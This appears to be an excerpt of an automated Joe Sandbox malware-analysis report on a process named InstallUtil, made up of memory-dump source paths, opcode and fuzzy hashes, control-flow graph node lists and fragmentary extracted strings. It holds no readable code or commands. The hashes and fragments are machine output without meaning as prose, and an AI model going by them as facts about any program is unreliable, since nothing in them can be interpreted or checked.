                                                • Opcode ID: f6e0850f69691491ee430d812dfb0c789bc10d62e2c042e377a39a7309be5fe0
                                                • Instruction ID: 5d4f25c2fff0852c09dfdda36cb8dde0bd71e0ad658fb0a863c079f333343ac7
                                                • Opcode Fuzzy Hash: f6e0850f69691491ee430d812dfb0c789bc10d62e2c042e377a39a7309be5fe0
                                                • Instruction Fuzzy Hash: 56718471E006298FEB68CF6AC944B9DBAF2AF89300F14C1AAD40DA7254DB345A85CF51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b851a56518503b0813286d4de66d15241803cfee4f176cc5bdbc8e6ef41e7edb
                                                • Instruction ID: 3faa04d4ee14091a3debc8df36461750bf0a81ceefedfe0532817377ea540145
                                                • Opcode Fuzzy Hash: b851a56518503b0813286d4de66d15241803cfee4f176cc5bdbc8e6ef41e7edb
                                                • Instruction Fuzzy Hash: FF41ABB1D016189BEB58CF6BCD457CAFAF3AFC9204F04C1AAD50CA6265DB740A86CF50
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 337145b20da3870f4d84f9abc8d0b1ea83d00400244de6682bd1ac130b2879ab
                                                • Instruction ID: 5720df686d24784ab834d4f8bcbf0428208572bfdaff4c583084b467bb814c25
                                                • Opcode Fuzzy Hash: 337145b20da3870f4d84f9abc8d0b1ea83d00400244de6682bd1ac130b2879ab
                                                • Instruction Fuzzy Hash: 2C4188B1E016189BEB58CF6BDD447DAFAF3AFC8310F04C1AAC50CA6264DB740A858F51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1894cb8af776d8aecf968f76fe368e53af4902b01035dae18d1639c6fae70d8e
                                                • Instruction ID: a21d88898dd62b9a88886725daa99bc45314aa77390700da8615ebf895a1fd44
                                                • Opcode Fuzzy Hash: 1894cb8af776d8aecf968f76fe368e53af4902b01035dae18d1639c6fae70d8e
                                                • Instruction Fuzzy Hash: 0141D2B0D002098BEB58DFAAC9447DEBBF2BF88300F24D16AC458AB2A4DB755945CF54
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f0e3b044a02b9b4d2f50309512ae7836fae83cb44bb6a2c65146c2d9b68ebdb
                                                • Instruction ID: 0321c4db258ef94f158bd2cdd4586a4cdad527fb205420cc42697b93cc494113
                                                • Opcode Fuzzy Hash: 5f0e3b044a02b9b4d2f50309512ae7836fae83cb44bb6a2c65146c2d9b68ebdb
                                                • Instruction Fuzzy Hash: 9F416BB1E016189BEB58CF6BCD457CAFAF3AFC8304F14C1AAD50CA6264DB740A858F51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1af37b902ff97cb04bc710b9dbceb7ec879f55f97f570f5155734a7919125c5f
                                                • Instruction ID: c3b3671f500e6ed0c586bab03392b73c4c66c169f30a0d57c212503a82d3690e
                                                • Opcode Fuzzy Hash: 1af37b902ff97cb04bc710b9dbceb7ec879f55f97f570f5155734a7919125c5f
                                                • Instruction Fuzzy Hash: D6416CB1E016189BEB58CF6BDD457CAFAF3AFC8304F04C1AAD50CA6254DB740A858F51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88c905bff5c783dad7649547113130cc56c48ce1b8213df366f65fc690f82f16
                                                • Instruction ID: 82bff7c22364e0353a8675d9d2de6b42e175ba8d835a9d03beb30bafeef0f360
                                                • Opcode Fuzzy Hash: 88c905bff5c783dad7649547113130cc56c48ce1b8213df366f65fc690f82f16
                                                • Instruction Fuzzy Hash: 76415AB1E016189BEB58CF6BCD457CAFAF3AFC8314F14C1AAD50CA6264DB740A858F51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27af95d4b48d3a105117a7bbc247d8fc110354cadaf82ef1cf8d329a98ac058a
                                                • Instruction ID: 3187a49c8d2423b3fb1143c7b37a2a86bae2a864c07412bb31cbe4b48bce1ba1
                                                • Opcode Fuzzy Hash: 27af95d4b48d3a105117a7bbc247d8fc110354cadaf82ef1cf8d329a98ac058a
                                                • Instruction Fuzzy Hash: EF4169B1E016188BEB58CF6BD9457DAFAF3AFC8310F14C1AAC54CA6264DB740A858F51
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a7ecbabfb59d8fda70d4b0f4b3607e992f6e3f6dc6d68bf4d0014e34f8fe389
                                                • Instruction ID: fd0bb2d0fbda4b85edb0fdf00140beeaaebdf5997efc764a83b0efaf16b9a3d6
                                                • Opcode Fuzzy Hash: 0a7ecbabfb59d8fda70d4b0f4b3607e992f6e3f6dc6d68bf4d0014e34f8fe389
                                                • Instruction Fuzzy Hash: B141D370E01218CFDB58DFAAD95069EFBF2AF88300F24D12AD418BB268DB745945CF45

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 10a6e70-10a6ea5 1 10a6eab-10a6ece 0->1 2 10a72d4-10a72d8 0->2 11 10a6f7c-10a6f80 1->11 12 10a6ed4-10a6ee1 1->12 3 10a72da-10a72ee 2->3 4 10a72f1-10a72ff 2->4 9 10a7370-10a7385 4->9 10 10a7301-10a7316 4->10 18 10a738c-10a7399 9->18 19 10a7387-10a738a 9->19 20 10a7318-10a731b 10->20 21 10a731d-10a732a 10->21 15 10a6fc8-10a6fd1 11->15 16 10a6f82-10a6f90 11->16 24 10a6ee3-10a6eee 12->24 25 10a6ef0 12->25 22 10a73e7 15->22 23 10a6fd7-10a6fe1 15->23 16->15 36 10a6f92-10a6fad 16->36 26 10a739b-10a73d6 18->26 19->26 27 10a732c-10a736d 20->27 21->27 30 10a73ec-10a741c 22->30 23->2 28 10a6fe7-10a6ff0 23->28 31 10a6ef2-10a6ef4 24->31 25->31 75 10a73dd-10a73e4 26->75 34 10a6fff-10a700b 28->34 35 10a6ff2-10a6ff7 28->35 53 10a741e-10a7434 30->53 54 10a7435-10a743c 30->54 31->11 39 10a6efa-10a6f5c 31->39 34->30 37 10a7011-10a7017 34->37 35->34 59 10a6fbb 36->59 60 10a6faf-10a6fb9 36->60 42 10a72be-10a72c2 37->42 43 10a701d-10a702d 37->43 87 10a6f5e 39->87 88 10a6f62-10a6f79 39->88 42->22 47 10a72c8-10a72ce 42->47 57 10a702f-10a703f 43->57 58 10a7041-10a7043 43->58 47->2 47->28 63 10a7046-10a704c 57->63 58->63 64 10a6fbd-10a6fbf 59->64 60->64 63->42 70 10a7052-10a7061 63->70 64->15 71 10a6fc1 64->71 72 10a710f-10a713a call 10a6cb8 * 2 70->72 73 10a7067 70->73 71->15 92 10a7140-10a7144 72->92 93 10a7224-10a723e 72->93 77 10a706a-10a707b 73->77 77->30 79 10a7081-10a7093 77->79 79->30 82 10a7099-10a70b1 79->82 144 10a70b3 call 10a7440 82->144 145 10a70b3 call 10a7450 82->145 85 10a70b9-10a70c9 85->42 86 10a70cf-10a70d2 85->86 90 10a70dc-10a70df 86->90 91 10a70d4-10a70da 86->91 87->88 88->11 90->22 95 10a70e5-10a70e8 90->95 91->90 91->95 92->42 94 10a714a-10a714e 92->94 93->2 111 10a7244-10a7248 93->111 98 10a7150-10a715d 94->98 99 10a7176-10a717c 94->99 100 10a70ea-10a70ee 95->100 101 10a70f0-10a70f3 95->101 114 10a715f-10a716a 98->114 115 10a716c 98->115 103 10a717e-10a7182 99->103 104 10a71b7-10a71bd 99->104 100->101 102 10a70f9-10a70fd 100->102 101->22 101->102 102->22 109 10a7103-10a7109 102->109 103->104 110 10a7184-10a718d 103->110 106 10a71c9-10a71cf 104->106 107 10a71bf-10a71c3 104->107 112 10a71db-10a71dd 106->112 113 10a71d1-10a71d5 106->113 107->75 107->106 109->72 109->77 116 10a718f-10a7194 110->116 117 10a719c-10a71b2 110->117 118 10a724a-10a7254 call 10a5b58 111->118 119 10a7284-10a7288 111->119 120 10a71df-10a71e8 112->120 121 10a7212-10a7214 112->121 113->42 113->112 122 10a716e-10a7170 114->122 115->122 116->117 117->42 118->119 132 10a7256-10a726b 118->132 119->75 124 10a728e-10a7292 119->124 127 10a71ea-10a71ef 120->127 128 10a71f7-10a720d 120->128 121->42 129 10a721a-10a7221 121->129 122->42 122->99 124->75 130 10a7298-10a72a5 124->130 127->128 128->42 135 10a72a7-10a72b2 130->135 136 10a72b4 130->136 132->119 141 10a726d-10a7282 132->141 138 10a72b6-10a72b8 135->138 136->138 138->42 138->75 141->2 141->119 144->85 145->85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
                                                • API String ID: 0-2636989756
                                                • Opcode ID: 25676d221b94535e79a3055acda6a12700738a7a5c184724caf8afe04f9d9a74
                                                • Instruction ID: 39a1c2331ea778753698f4f3b87e5db98388516362a3ae00e4288e9036dfdcf5
                                                • Opcode Fuzzy Hash: 25676d221b94535e79a3055acda6a12700738a7a5c184724caf8afe04f9d9a74
                                                • Instruction Fuzzy Hash: 89126B30A002088FCB65CFA8D984A9EBBF2FF89314F558599F9859B361D732ED41CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 836 10a215c-10a2166 838 10a2168-10a217c 836->838 839 10a20f1-10a2100 836->839 842 10a2109 838->842 843 10a217e-10a21ab 838->843 841 10a2107 839->841 841->842 844 10a2110-10a2138 842->844 847 10a21cd-10a221c 843->847 848 10a21ad-10a21cc 843->848 852 10a221e-10a2225 847->852 853 10a2237-10a223f 847->853 854 10a222e-10a2235 852->854 855 10a2227-10a222c 852->855 856 10a2242-10a2256 853->856 854->856 855->856 859 10a2258-10a225f 856->859 860 10a226c-10a2274 856->860 861 10a2261-10a2263 859->861 862 10a2265-10a226a 859->862 863 10a2276-10a227a 860->863 861->863 862->863 865 10a22da-10a22dd 863->865 866 10a227c-10a2291 863->866 867 10a22df-10a22f4 865->867 868 10a2325-10a232b 865->868 866->865 874 10a2293-10a2296 866->874 867->868 878 10a22f6-10a22fa 867->878 870 10a2331-10a2333 868->870 871 10a2e26 868->871 870->871 872 10a2339-10a233e 870->872 875 10a2e2b-10a2f52 871->875 876 10a2dd4-10a2dd8 872->876 877 10a2344 872->877 879 10a2298-10a229a 874->879 880 10a22b5-10a22d3 call 10a02c8 874->880 881 10a2dda-10a2ddd 876->881 882 10a2ddf-10a2e25 876->882 877->876 883 10a22fc-10a2300 878->883 884 10a2302-10a2320 call 10a02c8 878->884 879->880 885 10a229c-10a229f 879->885 880->865 881->875 881->882 883->868 883->884 884->868 885->865 890 10a22a1-10a22b3 885->890 890->865 890->880
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xoq$Xoq$Xoq$Xoq
                                                • API String ID: 0-1961338500
                                                • Opcode ID: 0a216253c40f18e746d1b95b511ff480d8fc082769b43dd4f1adac83dc234f15
                                                • Instruction ID: 1c7b2c9ecbc3bc73f59bacfa4062c99a344b5a9b9b61fc80999e2f838235c25c
                                                • Opcode Fuzzy Hash: 0a216253c40f18e746d1b95b511ff480d8fc082769b43dd4f1adac83dc234f15
                                                • Instruction Fuzzy Hash: 82B124719442A48ECF168FF884547F97F71BF4B304F285AEAC0C1BA52AD63A4942E780

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1535 10a8801-10a881d 1536 10a8829-10a8835 1535->1536 1537 10a881f-10a8824 1535->1537 1540 10a8837-10a8839 1536->1540 1541 10a8845-10a884a 1536->1541 1538 10a8bbe-10a8bc3 1537->1538 1542 10a8841-10a8843 1540->1542 1541->1538 1542->1541 1543 10a884f-10a885b 1542->1543 1545 10a886b-10a8870 1543->1545 1546 10a885d-10a8869 1543->1546 1545->1538 1546->1545 1548 10a8875-10a8880 1546->1548 1550 10a892a-10a8935 1548->1550 1551 10a8886-10a8891 1548->1551 1556 10a893b-10a894a 1550->1556 1557 10a89d8-10a89e4 1550->1557 1554 10a8893-10a88a5 1551->1554 1555 10a88a7 1551->1555 1558 10a88ac-10a88ae 1554->1558 1555->1558 1566 10a895b-10a896a 1556->1566 1567 10a894c-10a8956 1556->1567 1564 10a89e6-10a89f2 1557->1564 1565 10a89f4-10a8a06 1557->1565 1560 10a88ce-10a88d3 1558->1560 1561 10a88b0-10a88bf 1558->1561 1560->1538 1561->1560 1571 10a88c1-10a88cc 1561->1571 1564->1565 1576 10a8a34-10a8a3f 1564->1576 1579 10a8a2a-10a8a2f 1565->1579 1580 10a8a08-10a8a14 1565->1580 1574 10a898e-10a8997 1566->1574 1575 10a896c-10a8978 1566->1575 1567->1538 1571->1560 1583 10a88d8-10a88e1 1571->1583 1589 10a8999-10a89ab 1574->1589 1590 10a89ad 1574->1590 1585 10a897a-10a897f 1575->1585 1586 10a8984-10a8989 1575->1586 1587 10a8b21-10a8b2c 1576->1587 1588 10a8a45-10a8a4e 1576->1588 1579->1538 1596 10a8a20-10a8a25 1580->1596 1597 10a8a16-10a8a1b 1580->1597 1599 10a88ed-10a88fc 1583->1599 1600 10a88e3-10a88e8 1583->1600 1585->1538 1586->1538 1602 10a8b2e-10a8b38 1587->1602 1603 10a8b56-10a8b65 1587->1603 1604 10a8a50-10a8a62 1588->1604 1605 10a8a64 1588->1605 1591 10a89b2-10a89b4 1589->1591 1590->1591 1591->1557 1594 10a89b6-10a89c2 1591->1594 1614 10a89ce-10a89d3 1594->1614 1615 10a89c4-10a89c9 1594->1615 1596->1538 1597->1538 1610 10a88fe-10a890a 1599->1610 1611 10a8920-10a8925 1599->1611 1600->1538 1621 10a8b3a-10a8b46 1602->1621 1622 10a8b4f-10a8b54 1602->1622 1618 10a8bb9 1603->1618 1619 10a8b67-10a8b76 1603->1619 1607 10a8a69-10a8a6b 1604->1607 1605->1607 1612 10a8a7b 1607->1612 1613 10a8a6d-10a8a79 1607->1613 1628 10a890c-10a8911 1610->1628 1629 10a8916-10a891b 1610->1629 1611->1538 1620 10a8a80-10a8a82 1612->1620 1613->1620 1614->1538 1615->1538 1618->1538 1619->1618 1631 10a8b78-10a8b90 1619->1631 1625 10a8a8e-10a8aa1 1620->1625 1626 10a8a84-10a8a89 1620->1626 1621->1622 1633 10a8b48-10a8b4d 1621->1633 1622->1538 1634 10a8ad9-10a8ae3 1625->1634 1635 10a8aa3 1625->1635 1626->1538 1628->1538 1629->1538 1646 10a8bb2-10a8bb7 1631->1646 1647 10a8b92-10a8bb0 1631->1647 1633->1538 1641 10a8b02-10a8b0e 1634->1641 1642 10a8ae5-10a8af1 call 10a8270 1634->1642 1637 10a8aa6-10a8ab7 call 10a8270 1635->1637 1644 10a8ab9-10a8abc 1637->1644 1645 10a8abe-10a8ac3 1637->1645 1657 10a8b10-10a8b15 1641->1657 1658 10a8b17 1641->1658 1655 10a8af8-10a8afd 1642->1655 1656 10a8af3-10a8af6 1642->1656 1644->1645 1649 10a8ac8-10a8acb 1644->1649 1645->1538 1646->1538 1647->1538 1652 10a8ad1-10a8ad7 1649->1652 1653 10a8bc4-10a8bd8 1649->1653 1652->1634 1652->1637 1662 10a8c2a 1653->1662 1663 10a8bda-10a8bec 1653->1663 1655->1538 1656->1641 1656->1655 1659 10a8b1c 1657->1659 1658->1659 1659->1538 1664 10a8c2f-10a8c31 1662->1664 1665 10a8bf8-10a8c03 1663->1665 1666 10a8bee-10a8bf3 1663->1666 1668 10a8c33-10a8c42 1664->1668 1669 10a8c66-10a8c78 1664->1669 1673 10a8cab-10a8cb4 1665->1673 1674 10a8c09-10a8c14 1665->1674 1670 10a8d79-10a8d7d 1666->1670 1668->1669 1676 10a8c44-10a8c5a 1668->1676 1677 10a8c7e-10a8c8c 1669->1677 1678 10a8d77 1669->1678 1683 10a8cff-10a8d0a 1673->1683 1684 10a8cb6-10a8cc1 1673->1684 1674->1662 1685 10a8c16-10a8c28 1674->1685 1676->1669 1697 10a8c5c-10a8c61 1676->1697 1686 10a8c98-10a8c9b 1677->1686 1687 10a8c8e-10a8c93 1677->1687 1678->1670 1695 10a8d0c-10a8d1e 1683->1695 1696 10a8d20 1683->1696 1684->1678 1698 10a8cc7-10a8cd9 1684->1698 1685->1664 1688 10a8d7e-10a8dae call 10a8390 1686->1688 1689 10a8ca1-10a8ca4 1686->1689 1687->1670 1715 10a8db0-10a8dc4 1688->1715 1716 10a8dc5-10a8dc9 1688->1716 1689->1677 1694 10a8ca6 1689->1694 1694->1678 1699 10a8d25-10a8d27 1695->1699 1696->1699 1697->1670 1698->1678 1705 10a8cdf-10a8ce3 1698->1705 1699->1678 1702 10a8d29-10a8d38 1699->1702 1712 10a8d3a-10a8d43 1702->1712 1713 10a8d60 1702->1713 1708 10a8cef-10a8cf2 1705->1708 1709 10a8ce5-10a8cea 1705->1709 1708->1688 1710 10a8cf8-10a8cfb 1708->1710 1709->1670 1710->1705 1714 10a8cfd 1710->1714 1720 10a8d59 1712->1720 1721 10a8d45-10a8d57 1712->1721 1717 10a8d65-10a8d67 1713->1717 1714->1678 1717->1678 1719 10a8d69-10a8d75 1717->1719 1719->1670 1723 10a8d5e 1720->1723 1721->1723 1723->1717
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'kq$4'kq$;kq
                                                • API String ID: 0-3326240858
                                                • Opcode ID: 693003d4c81e0511610404d65cd6d9377609e86b4b67fa1e003050ac2f1c6faa
                                                • Instruction ID: 26b1708c93d09a3a3a8ae9196e6ff64add4c86c08c87f64ee2a710d93b0814bc
                                                • Opcode Fuzzy Hash: 693003d4c81e0511610404d65cd6d9377609e86b4b67fa1e003050ac2f1c6faa
                                                • Instruction Fuzzy Hash: 5FF190703105018FEB656EADC55873D7BE6EF94606F5880EBE182CB3B5EA29CC81C781

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1726 10a5c10-10a5c1d 1727 10a5c1f-10a5c23 1726->1727 1728 10a5c25-10a5c27 1726->1728 1727->1728 1729 10a5c2c-10a5c37 1727->1729 1730 10a5e38-10a5e3f 1728->1730 1731 10a5c3d-10a5c44 1729->1731 1732 10a5e40 1729->1732 1733 10a5c4a-10a5c59 1731->1733 1734 10a5dd9-10a5ddf 1731->1734 1735 10a5e45-10a5e7d 1732->1735 1733->1735 1736 10a5c5f-10a5c6e 1733->1736 1737 10a5de1-10a5de3 1734->1737 1738 10a5de5-10a5de9 1734->1738 1756 10a5e7f-10a5e84 1735->1756 1757 10a5e86-10a5e8a 1735->1757 1745 10a5c83-10a5c86 1736->1745 1746 10a5c70-10a5c73 1736->1746 1737->1730 1739 10a5deb-10a5df1 1738->1739 1740 10a5e36 1738->1740 1739->1732 1741 10a5df3-10a5df6 1739->1741 1740->1730 1741->1732 1744 10a5df8-10a5e0d 1741->1744 1763 10a5e0f-10a5e15 1744->1763 1764 10a5e31-10a5e34 1744->1764 1747 10a5c92-10a5c98 1745->1747 1749 10a5c88-10a5c8b 1745->1749 1746->1747 1748 10a5c75-10a5c78 1746->1748 1758 10a5c9a-10a5ca0 1747->1758 1759 10a5cb0-10a5ccd 1747->1759 1751 10a5d79-10a5d7f 1748->1751 1752 10a5c7e 1748->1752 1754 10a5cde-10a5ce4 1749->1754 1755 10a5c8d 1749->1755 1768 10a5d81-10a5d87 1751->1768 1769 10a5d97-10a5da1 1751->1769 1760 10a5da4-10a5da6 1752->1760 1761 10a5cfc-10a5d0e 1754->1761 1762 10a5ce6-10a5cec 1754->1762 1755->1760 1765 10a5e90-10a5e92 1756->1765 1757->1765 1766 10a5ca2 1758->1766 1767 10a5ca4-10a5cae 1758->1767 1796 10a5cd6-10a5cd9 1759->1796 1780 10a5daf-10a5db1 1760->1780 1789 10a5d1e-10a5d41 1761->1789 1790 10a5d10-10a5d1c 1761->1790 1770 10a5cee 1762->1770 1771 10a5cf0-10a5cfa 1762->1771 1772 10a5e27-10a5e2a 1763->1772 1773 10a5e17-10a5e25 1763->1773 1764->1730 1774 10a5ea7-10a5eae 1765->1774 1775 10a5e94-10a5ea6 1765->1775 1766->1759 1767->1759 1776 10a5d8b-10a5d95 1768->1776 1777 10a5d89 1768->1777 1769->1760 1770->1761 1771->1761 1772->1732 1782 10a5e2c-10a5e2f 1772->1782 1773->1732 1773->1772 1776->1769 1777->1769 1786 10a5db3-10a5db7 1780->1786 1787 10a5dc5-10a5dc7 1780->1787 1782->1763 1782->1764 1786->1787 1793 10a5db9-10a5dbd 1786->1793 1794 10a5dcb-10a5dce 1787->1794 1789->1732 1802 10a5d47-10a5d4a 1789->1802 1800 10a5d69-10a5d77 1790->1800 1793->1732 1797 10a5dc3 1793->1797 1794->1732 1798 10a5dd0-10a5dd3 1794->1798 1796->1760 1797->1794 1798->1733 1798->1734 1800->1760 1802->1732 1804 10a5d50-10a5d62 1802->1804 1804->1800
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,oq$,oq$8
                                                • API String ID: 0-3995569542
                                                • Opcode ID: f02f37916592a263acf3144ebfede0ff02691298909746c1be3e8e26b7fb4893
                                                • Instruction ID: d4a633e23db7debd33f654cae1b91089efbdf05101b3e3cd1fe26a3b68264d08
                                                • Opcode Fuzzy Hash: f02f37916592a263acf3144ebfede0ff02691298909746c1be3e8e26b7fb4893
                                                • Instruction Fuzzy Hash: 20817E34A00105CFCB68DFADCC889AEBBF6BF89314B9581A9D645DB365D731E841CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq
                                                • API String ID: 0-3550614674
                                                • Opcode ID: a3cc6a846fee7403d39ffe3927ff8d2f0e7a995bc7cdc60d3bcfb608a93a8bd4
                                                • Instruction ID: 848ce0f3df9a9b9019a083a4e69eecdee83d4b97d308d4fc72b9944c46588a21
                                                • Opcode Fuzzy Hash: a3cc6a846fee7403d39ffe3927ff8d2f0e7a995bc7cdc60d3bcfb608a93a8bd4
                                                • Instruction Fuzzy Hash: 9C524274A00228CFEB64DBA4C950B9EBB72FF94300F1091AAD14A6B3A5CF359D85DF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hoq$Hoq
                                                • API String ID: 0-3106737575
                                                • Opcode ID: 8a09b4f17ace0c701c0301108368e1a3f0327fcc9c174a4b2cb2f72e1a0aaa44
                                                • Instruction ID: b8079aba3825a6ccfc5851a409a0c582933a05035903ef9991d88e5ab6d4365d
                                                • Opcode Fuzzy Hash: 8a09b4f17ace0c701c0301108368e1a3f0327fcc9c174a4b2cb2f72e1a0aaa44
                                                • Instruction Fuzzy Hash: 05B1CE317042518FDB669FB8D898B6E7BE2BB88310F5445A9E886DB395DF34CC41C790
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRkq$LRkq
                                                • API String ID: 0-2882777380
                                                • Opcode ID: a00e0e1528b7d25e365b375ffbe632e899ab12ee95de51c78064059b60bfa5e9
                                                • Instruction ID: e450346e8555c48cb00de318feab702fd9c7bf4f8a4fe2b2ef0b6a6f31a50de7
                                                • Opcode Fuzzy Hash: a00e0e1528b7d25e365b375ffbe632e899ab12ee95de51c78064059b60bfa5e9
                                                • Instruction Fuzzy Hash: 0D81A035B001168FCB58DF79D964D6E77BABF88600B1581AAE605DB3B5DB30DE02CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (&kq$(oq
                                                • API String ID: 0-2620321033
                                                • Opcode ID: bd67e611ffbc846811c28c427ad2075309cbb4bfee17b3498114e179ec37b769
                                                • Instruction ID: ce71e4b2c8b4d4cfa28f71ffba57e1646059d4b99d2a5d08de588c249bb4e2b5
                                                • Opcode Fuzzy Hash: bd67e611ffbc846811c28c427ad2075309cbb4bfee17b3498114e179ec37b769
                                                • Instruction Fuzzy Hash: 3271A271F002599BDB59DFB9C8906AEBBF6AFC8700F148629E405AB384DF309D42C791
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xoq$Xoq
                                                • API String ID: 0-251439590
                                                • Opcode ID: 22f6b5edbaf61c3afb4203049ed4bda00bbd533c47c9d68f49642744dae49216
                                                • Instruction ID: 7f37d9b5cc9febee6a6a4e054c041443679c5ec955800cff929f9384f0b2185a
                                                • Opcode Fuzzy Hash: 22f6b5edbaf61c3afb4203049ed4bda00bbd533c47c9d68f49642744dae49216
                                                • Instruction Fuzzy Hash: CA313775B003258BDF698AFE959427FA9DABBC4210F88447AD986CB394DF74DC408390
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRkq
                                                • API String ID: 0-1052062081
                                                • Opcode ID: b4e0240243e5bbef3cf9406fddf3f4c54786e38e806cb653703ea479b9c082f3
                                                • Instruction ID: 33c32c3d6c23a17751030f17dfb2be7cf4fea12f1ad6f6c40b341a11dec60344
                                                • Opcode Fuzzy Hash: b4e0240243e5bbef3cf9406fddf3f4c54786e38e806cb653703ea479b9c082f3
                                                • Instruction Fuzzy Hash: B822D97890122ADFCF54EF65E984A9DBBB2FF48305F1086AAD509A7358DB306D85CF40
                                                Strings
